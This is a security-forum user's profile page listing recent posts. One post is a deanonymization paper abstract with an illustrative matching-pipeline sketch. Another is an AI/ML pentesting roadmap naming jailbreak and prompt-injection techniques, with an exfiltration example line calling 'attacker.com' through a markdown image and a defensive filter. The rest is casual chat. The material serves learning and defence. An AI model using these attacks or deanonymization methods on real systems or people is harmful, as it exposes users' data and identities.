Nytro

Administrators
  • Posts: 18794
  • Joined
  • Last visited
  • Days Won: 742

Nytro last won the day on March 9

Nytro had the most liked content!

About Nytro

  • Birthday 03/11/1991

Recent Profile Visitors

115941 profile views

Nytro's Achievements

Mentor

Mentor (12/14)

  • Well Followed (Rare)
  • Reacting Well (Rare)
  • Dedicated (Rare)
  • Conversation Starter (Rare)
  • One Year In (Rare)

Recent Badges

Reputation: 5.6k

  1. "A crypto drainer is a type of malicious software or scam tool designed to steal cryptocurrency from a victim’s wallet, usually by tricking them into approving a harmful transaction." - I didn't even know what this junk was. Good thing malware like that can't reach my wallet full of 10 RON bills for tips.
  2. Yes, their research isn't exactly practical, but it's quite interesting as a methodology. The basic idea, of course, is not to give out details about yourself anywhere. Being "HackerMan1337" is pointless if your Facebook handle is the same. Yes. Or LLMs, since they're good at exactly this.
  3. We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identity-relevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data, our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using cross-platform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user’s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered. Download: https://arxiv.org/pdf/2602.16800
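    The three-stage closed-world pipeline the abstract describes (feature extraction, embedding search, verification of top candidates) can be sketched roughly as below. This is a minimal illustrative sketch, not the paper's code: the paper uses LLMs for extraction/verification and a semantic embedding model for search, while this stand-in uses a regex extractor and a bag-of-features cosine similarity; all function names and the threshold are my own assumptions.

    ```python
    # Hypothetical sketch of the matching pipeline: (1) extract identity-relevant
    # features, (2) embed and rank candidates, (3) keep only confident matches.
    import math
    import re
    from collections import Counter

    def extract_features(text: str) -> list[str]:
        # Stand-in for an LLM feature extractor: keep capitalized words and
        # multi-digit numbers as pseudo identity signals.
        return re.findall(r"[A-Z][a-z]+|\d{2,}", text)

    def embed(features: list[str]) -> Counter:
        # Stand-in for a semantic embedding: bag-of-features vector.
        return Counter(f.lower() for f in features)

    def cosine(a: Counter, b: Counter) -> float:
        dot = sum(a[k] * b[k] for k in a)
        na = math.sqrt(sum(v * v for v in a.values()))
        nb = math.sqrt(sum(v * v for v in b.values()))
        return dot / (na * nb) if na and nb else 0.0

    def match(profile: str, candidates: dict[str, str],
              top_k: int = 3, threshold: float = 0.5) -> list[tuple[str, float]]:
        """Rank candidates by feature similarity; keep only confident ones.
        In the paper, an LLM reasoning pass would verify these top candidates."""
        q = embed(extract_features(profile))
        scored = sorted(
            ((cid, cosine(q, embed(extract_features(text))))
             for cid, text in candidates.items()),
            key=lambda x: x[1], reverse=True)
        return [(cid, s) for cid, s in scored[:top_k] if s >= threshold]

    profiles = {
        "user_a": "Works at Acme in Berlin since 2015, loves Rust and chess.",
        "user_b": "Baker from Lyon, posts about sourdough and cycling.",
    }
    query = "Berlin engineer at Acme, chess player, writing Rust since 2015."
    print(match(query, profiles))  # user_a ranks far above user_b
    ```

    The point of the sketch is the shape of the attack, not its strength: replacing the regex extractor and bag-of-features vectors with an LLM and real embeddings is exactly what makes the paper's version scale.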
  4. πŸ›‘οΈ AI/ML Pentesting Roadmap A comprehensive, structured guide to learning AI/ML security and penetration testing β€” from zero to practitioner. πŸ“‹ Table of Contents Prerequisites Phase 1 β€” Foundations Phase 2 β€” AI/ML Security Concepts Phase 3 β€” Prompt Injection & LLM Attacks Phase 4 β€” Hands-On Practice Phase 5 β€” Advanced Exploitation Techniques Phase 6 β€” Real-World Research & Bug Bounty Standards, Frameworks & References Tools & Repositories Books, PDFs & E-Books Video Resources CTF & Competitions Bug Bounty Programs Community & News Suggested Learning Path by Experience Level Prerequisites Before diving into AI/ML pentesting, ensure you have the following foundation: General Security Basics PortSwigger Web Security Academy β€” Free, hands-on web security training (XSS, SQLi, SSRF, etc.) TryHackMe β€” Pre-Security Path HackTheBox Academy OWASP Top 10 Programming (Python is essential) Python for Everybody β€” Coursera Automate the Boring Stuff with Python β€” Free online book CS50P β€” Python β€” Free Harvard course APIs & HTTP Understand REST APIs, HTTP methods, headers, and authentication flows Postman Learning Center Practice with tools: curl, Burp Suite, Postman Phase 1 β€” Foundations 1.1 Machine Learning Fundamentals Resource Type Cost Machine Learning β€” Andrew Ng (Coursera) Course Audit Free Introduction to ML β€” edX Course Audit Free fast.ai Practical Deep Learning Course Free Google Machine Learning Crash Course Course Free Kaggle ML Courses Course Free 3Blue1Brown β€” Neural Networks Video Free 1.2 Large Language Models (LLMs) Understanding how LLMs work is critical before attacking them. 
Resource Type Cost Andrej Karpathy β€” Intro to LLMs Video Free Andrej Karpathy β€” Let's build GPT Video Free Hugging Face NLP Course Course Free LLM University by Cohere Course Free Prompt Engineering Guide Guide Free Phase 2 β€” AI/ML Security Concepts 2.1 Core Security Concepts OWASP LLM Top 10 β€” The definitive OWASP list for LLM vulnerabilities MITRE ATLAS Matrix β€” Adversarial Tactics, Techniques, and Common Knowledge for AI systems NIST AI Risk Management Framework β€” Federal AI risk guidance IBM β€” AI Security Overview AI Village β€” LLM Threat Modeling Promptingguide β€” Adversarial Attacks HackerOne β€” Ultimate Guide to Managing Ethical and Security Risks in AI 2.2 Attack Surface Overview Key attack vectors in AI/ML systems: Prompt Injection β€” Manipulating LLM behavior through crafted inputs Jailbreaking β€” Bypassing safety filters and guardrails Model Inversion β€” Extracting training data from a model Membership Inference β€” Determining if data was in training set Data Poisoning β€” Corrupting training data to influence behavior Adversarial Examples β€” Perturbed inputs that fool classifiers Model Extraction/Stealing β€” Cloning a model via API queries Supply Chain Attacks β€” Malicious models/weights on platforms like Hugging Face Insecure Plugin/Tool Integration β€” Exploiting LLM agents with external tools Training Data Exfiltration β€” Extracting memorized private data Denial of Service β€” Overloading models via crafted prompts 2.3 MLOps & Infrastructure Security From MLOps to MLOops β€” JFrog Offensive ML Playbook AI Exploits β€” ProtectAI Awesome AI Security β€” ottosulin Phase 3 β€” Prompt Injection & LLM Attacks 3.1 Understanding Prompt Injection IBM Guide on Prompt Injection Simon Willison's Explanation of Prompt Injection Learn Prompting β€” Prompt Hacking and Injection PortSwigger LLM Attacks NCC Group β€” Exploring Prompt Injection Attacks Bugcrowd β€” AI Vulnerability Deep Dive: Prompt Injection 3.2 Jailbreaking Techniques DAN 
(Do Anything Now) β€” Classic jailbreak technique: Chatgpt-DAN Repo Role-playing / Persona manipulation Token smuggling β€” Encoding instructions to bypass filters Prompt leaking β€” Extracting system prompts Indirect prompt injection β€” Attacks via documents, web content, memory WideOpenAI β€” Jailbreak Collection PayloadsAllTheThings β€” Prompt Injection PALLMs β€” Payloads for Attacking LLMs 3.3 Indirect Prompt Injection A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes. Greshake β€” LLM Security / Not What You've Signed Up For Embrace The Red β€” Blog β€” Comprehensive blog covering real-world indirect injection GitHub Copilot Chat: Prompt Injection to Data Exfiltration Google AI Studio Data Exfiltration 3.4 Advanced Prompt Attack Techniques How to Persuade an LLM to Change Its System Prompt Bugcrowd Ultimate Guide to AI Security (PDF) Snyk OWASP Top 10 LLM (PDF) Vanna.AI Prompt Injection RCE β€” JFrog Phase 4 β€” Hands-On Practice 4.1 Interactive Platforms & Games Platform Description Link Gandalf LLM prompt testing game β€” extract the password gandalf.lakera.ai Prompt Airlines Gamified prompt injection learning promptairlines.com Crucible Interactive AI security challenges by Dreadnode crucible.dreadnode.io Immersive Labs AI Structured AI security exercises prompting.ai.immersivelabs.com Secdim AI Games Prompt injection games play.secdim.com/game/ai HackAPrompt Community prompt injection competition hackaprompt.com PortSwigger LLM Labs Hands-on web LLM attack labs Web Security Academy 4.2 Vulnerable-by-Design Projects Repository Description Damn Vulnerable LLM Agent β€” WithSecureLabs Intentionally vulnerable LLM agent ScottLogic Prompt Injection Playground Local prompt injection lab Greshake LLM Security Tools Proof-of-concept attacks 4.3 CTF Writeups to Study CTF Writeup β€” HackPack CTF 2024 LLM Edition LLM Pentest Writeups β€” System Weakness Phase 5 
β€” Advanced Exploitation Techniques 5.1 Agent & Tool Integration Attacks When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically. LLM Pentest: Leveraging Agent Integration for RCE β€” BlazeInfoSec LLM Pentest: Leveraging Agent Integration For RCE (full) Dumping a Database with an AI Chatbot β€” Synack CSWSH Meets LLM Chatbots 5.2 Data Exfiltration via LLMs Google AI Studio: LLM-Powered Data Exfiltration Google AI Studio Mass Data Exfil (Regression) Hacking Google Bard β€” From Prompt Injection to Data Exfiltration AWS Amazon Q Markdown Rendering Vulnerability GitHub Copilot Chat Data Exfiltration 5.3 Account Takeover & Authentication Attacks ChatGPT Account Takeover β€” Wildcard Web Cache Deception Shockwave β€” Critical ChatGPT Vulnerability (Web Cache Deception) Security Flaws in ChatGPT Ecosystem β€” Salt Security OpenAI Allowed Unlimited Credit on New Accounts β€” Checkmarx 5.4 XSS & Web Vulnerabilities in AI Products XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT β€” Imperva Zeroday on GitHub Copilot 5.5 Model & Infrastructure Attacks Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9) From ChatBot to SpyBot: ChatGPT Post-Exploitation β€” Imperva 5.6 Persistent Attacks & Memory Exploitation ChatGPT Persistent Denial of Service via Memory Attacks β€” Embrace the Red 5.7 Adversarial Machine Learning CleverHans Library β€” Adversarial example library ART (Adversarial Robustness Toolbox) β€” IBM Foolbox β€” Python toolbox for adversarial attacks Phase 6 β€” Real-World Research & Bug Bounty 6.1 Notable Research & Disclosures We Hacked Google AI for $50,000 β€” LandH New Google Gemini Content Manipulation Vulnerabilities β€” HiddenLayer Jailbreak of Meta AI (Llama 3.1) Revealing Config Details Bypass Instructions to Manipulate Google Bard My LLM Bug Bounty Journey on Hugging Face Hub Anonymised Penetration Test Report β€” Volkis Lakera Real World LLM Exploits (PDF) 6.2 
How to Find LLM Vulnerabilities Key areas to test when assessing an LLM-powered application: System prompt extraction β€” Can you leak the hidden system prompt? Instruction override β€” Can you ignore system-level instructions? Plugin/tool abuse β€” Can agent tools be misused (SSRF, RCE, SQLi)? Data exfiltration via markdown β€” Does the UI render ![](https://attacker.com?q=...) ? Persistent injection via memory β€” Can you inject instructions that persist in memory/RAG? PII leakage β€” Does the model reveal training data or other users' data? Cross-user data leakage β€” In multi-tenant apps, can you access other users' contexts? Authentication bypass β€” Can you trick the LLM into performing privileged actions? Standards, Frameworks & References Resource Description OWASP LLM Top 10 Top 10 LLM vulnerability classes MITRE ATLAS AI adversarial threat matrix NIST AI RMF US Federal AI risk management framework OWASP AI Exchange Cross-industry AI security guidance ISO/IEC 42001 International AI management standard ENISA AI Threat Landscape EU AI threat landscape report Google Secure AI Framework (SAIF) Google's AI security framework Tools & Repositories Offensive Tools Tool Purpose Garak LLM vulnerability scanner PyRIT Microsoft's Python Risk Identification Toolkit for LLMs LLM Fuzzer Fuzzing framework for LLMs PALLMs Payloads for attacking LLMs PromptInject Prompt injection attack framework PurpleLlama / CyberSecEval Meta's LLM security evaluation Defensive / Scanning Tools Tool Purpose Rebuff Prompt injection detection NeMo Guardrails NVIDIA guardrail framework Lakera Guard Commercial prompt injection protection AI Exploits β€” ProtectAI Real-world ML exploit collection ModelScan Scan ML model files for malicious code Reference Lists Resource Description Awesome LLM Security β€” corca-ai Curated LLM security list Awesome LLM β€” Hannibal046 Everything LLM including security Awesome AI Security β€” ottosulin General AI security resources LLM Hacker's Handbook 
Comprehensive hacking handbook PayloadsAllTheThings β€” Prompt Injection Payload collection WideOpenAI Jailbreak and bypass collection Chatgpt-DAN DAN jailbreak collection Books, PDFs & E-Books Resource Link LLM Hacker's Handbook GitHub OWASP Top 10 for LLM (Snyk) PDF Bugcrowd Ultimate Guide to AI Security PDF Lakera Real World LLM Exploits PDF HackerOne Ultimate Guide to Managing AI Risks E-Book Adversarial Machine Learning β€” Goodfellow et al. arXiv Video Resources Resource Link Penetration Testing Against and With AI/LLM/ML (Playlist) YouTube Andrej Karpathy β€” Intro to Large Language Models YouTube DEF CON AI Village Talks YouTube LiveOverflow β€” AI/ML Security YouTube 3Blue1Brown β€” Neural Networks Series YouTube John Hammond β€” AI Security Challenges YouTube Cybrary β€” Machine Learning Security Cybrary CTF & Competitions Competition Description Link Crucible Ongoing AI security challenges crucible.dreadnode.io HackAPrompt Annual prompt injection competition hackaprompt.com AI Village CTF (DEF CON) Annual AI security CTF at DEF CON aivillage.org Gandalf Self-paced LLM challenge gandalf.lakera.ai Prompt Airlines Gamified injection challenges promptairlines.com Hack The Box AI Challenges HTB AI-themed challenges hackthebox.com Secdim AI Games Web-based AI security games play.secdim.com/game/ai Bug Bounty Programs AI/ML security bug bounties are growing rapidly. 
Target these platforms: Program Scope Link OpenAI Bug Bounty ChatGPT, API, plugins bugcrowd.com/openai Google AI Bug Bounty Gemini, Bard, Vertex AI bughunters.google.com Meta AI Bug Bounty Llama models, Meta AI facebook.com/whitehat HuggingFace via ProtectAI Hub, models, spaces huntr.com Anthropic Bug Bounty Claude, API anthropic.com/security Microsoft (Copilot, Azure AI) Copilot, Azure OpenAI msrc.microsoft.com Huntr (AI/ML focused) Open source ML libraries huntr.com Tips for AI bug bounty: Focus on data exfiltration via markdown rendering (common finding) Test plugin/tool integrations thoroughly Look for prompt injection in RAG pipelines Explore memory and persistent context manipulation Check for cross-tenant data leakage in multi-user deployments Community & News Communities AI Village β€” DEF CON's AI security community OWASP AI Exchange β€” Open standard for AI security ProtectAI β€” AI security research and tools Embrace the Red β€” Blog β€” Leading blog on LLM security Kai Greshake's Research β€” Indirect prompt injection research Newsletters & Blogs The Batch β€” DeepLearning.AI β€” Weekly AI news Simon Willison's Weblog β€” Authoritative LLM security commentary HiddenLayer Research β€” AI security research Lakera Blog β€” LLM security insights PortSwigger Research β€” Web + AI security research Suggested Learning Path by Experience Level 🟒 Beginner (0–3 months) Complete PortSwigger Web Security Academy fundamentals Learn Python basics Take Google ML Crash Course Read OWASP LLM Top 10 Play Gandalf β€” all levels Read Simon Willison's prompt injection article Watch Andrej Karpathy β€” Intro to LLMs 🟑 Intermediate (3–9 months) Study MITRE ATLAS Matrix Complete PortSwigger LLM Attack labs Set up and exploit Damn Vulnerable LLM Agent Complete Prompt Airlines and Crucible challenges Read the LLM Hacker's Handbook Study the Embrace the Red blog in full Experiment with Garak and PyRIT Try Offensive ML Playbook πŸ”΄ Advanced (9+ months) Participate in AI Village 
CTF at DEF CON Submit findings to Huntr or OpenAI Bug Bounty Study adversarial ML with ART and CleverHans Read academic papers on model inversion, membership inference, and data extraction Contribute to open source tools like Garak or AI Exploits Build your own vulnerable LLM demo environment Write and publish research β€” blog posts, CVEs, conference talks Key Academic Papers Paper Year Explaining and Harnessing Adversarial Examples β€” Goodfellow et al. 2014 Extracting Training Data from Large Language Models β€” Carlini et al. 2021 Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection β€” Greshake et al. 2023 Membership Inference Attacks against Machine Learning Models β€” Shokri et al. 2017 Universal and Transferable Adversarial Attacks on Aligned Language Models β€” Zou et al. 2023 Jailbroken: How Does LLM Safety Training Fail? β€” Wei et al. 2023 Prompt Injection attack against LLM-integrated Applications 2023 Last updated: 2025 | Contributions welcome β€” submit a PR with new resources. Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection
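    The "data exfiltration via markdown" item in section 6.2 (and the matching bug-bounty tip) can be made concrete with a small defender-side check. This is an illustrative sketch of the mitigation, not code from the roadmap: the function name, the allowlist parameter, and the replacement text are my own assumptions.

    ```python
    # If an LLM's output contains ![](https://attacker.com?q=<secret>), the data
    # leaks as soon as the client renders the image. A minimal mitigation is to
    # strip markdown images whose host is not on an allowlist before rendering.
    import re
    from urllib.parse import urlparse

    MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

    def strip_untrusted_images(markdown: str, allowed_hosts: set[str]) -> str:
        """Replace markdown images pointing outside the allowlisted hosts."""
        def repl(m: re.Match) -> str:
            host = urlparse(m.group("url")).hostname or ""
            if host in allowed_hosts:
                return m.group(0)        # trusted image: keep as-is
            return "[image removed]"     # untrusted: potential exfil channel
        return MARKDOWN_IMAGE.sub(repl, markdown)

    out = ('Here is a chart: ![chart](https://cdn.example.com/a.png) '
           'and ![](https://attacker.com/x?q=SECRET_TOKEN)')
    print(strip_untrusted_images(out, {"cdn.example.com"}))
    ```

    As a tester, the inverse of this check is the finding: if the chat UI renders attacker-controlled image URLs from model output without such filtering, query-string exfiltration of the conversation context is usually possible.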
  5. Like any other tool, we use it to deliver faster. But we don't trust it. We verify the information, then we use it.
  6. What to learn: 1. The technical side - the easiest part, you can find documentation. 2. Understanding business - knowing what needs companies have (selling B2C to consumers is generally less profitable, in my opinion). 3. Knowing how to speak, sell, explain, and knowing the legislation - non-technical skills, harder to pick up than the technical ones. 4. Combine everything you have learned and solve a company's need, bring value (like in manele) and sell it. 5. Grow the company, make money, and live a good life by hiring good people to work for you.
  7. Hi, yes, Romania, Bulgaria, Serbia, Albania, Greece - Balkan gyros power ❤️
  8. Whoa, that would be great, I could put 200 RON toward my pension ❤️
  9. 1. Puneti* (spelling correction) 2. Old manele are the best ❤️
  10. Nytro

    1000 lei

    Won't you give him a few thousand euros out of the millions you make every day?
  11. Sorry, I'm having Internet problems on my yacht here in the Caribbean. My people are going to launch an Internet satellite to give me at least a Gigabit, like Digi. Are you coming over for some rum? Let's go to Havana for cigars, I just have to stop and refuel the boat because it has a big engine and burns a lot of fuel (it's fine, it's registered in Bulgaria).
  12. Hi, yes, my 2 million euro salary came in at the end of the month. At the end of the year I got a 5 million euro bonus. And I'm waiting for the stock to go up, because my shares are only worth a few tens of millions of euros - I can't buy a private jet like this...
  13. That is a "good" mix: they can sleep like babies while making a good amount of money. In the end, the answer to most questions is simple: money.
  14. This is a good point. There are also people doing both: whitehat while working for some governments, blackhat doing "bad" stuff like APTs.
  15. The main difference between a whitehat and a blackhat is how they sleep. Being a blackhat means doing illegal stuff. I know - hiding your IP and so on - but in the end you get some money and use it, or you make a mistake, and there is a real chance you end up in prison. I prefer less money and no worries. Regarding companies hiring in India or other countries, it is like people buying stuff: some buy from Temu, some get Lamborghinis; there is enough for everyone. As a whitehat, you need to offer quality services, and that, for sure, happens on the blackhat market as well. My short conclusion: it is very difficult to make enough money as a blackhat for it to actually be worth it. Few people pull that off, while there are millions of IT people simply doing well, having nice lives, families, and everything they really need (not Lambos).